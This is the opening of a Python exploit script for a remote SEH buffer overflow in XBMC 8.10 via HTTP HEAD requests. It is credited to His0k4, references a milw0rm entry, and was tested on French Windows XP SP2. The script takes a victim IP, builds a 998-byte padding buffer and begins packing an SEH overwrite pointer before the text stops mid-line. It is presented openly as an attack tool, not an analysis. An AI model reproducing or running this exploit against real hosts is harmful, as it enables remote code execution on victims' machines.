#!/usr/bin/python #[*] Usage : exploit.py [victime_ip] #[*] Bug : XBMC 8.10 (HEAD Request) Remote Buffer Overflow Exploit (SEH) #[*] Refer : http://www.milw0rm.com/exploits/8354 #[*] Tested on : Xp sp2 (fr) #[*] Exploited by : His0k4 #[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com #[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D import struct import sys, socket host = sys.argv[1] buff1 = 'A'*998 Pointer_To_Next_SEH = struct.pack('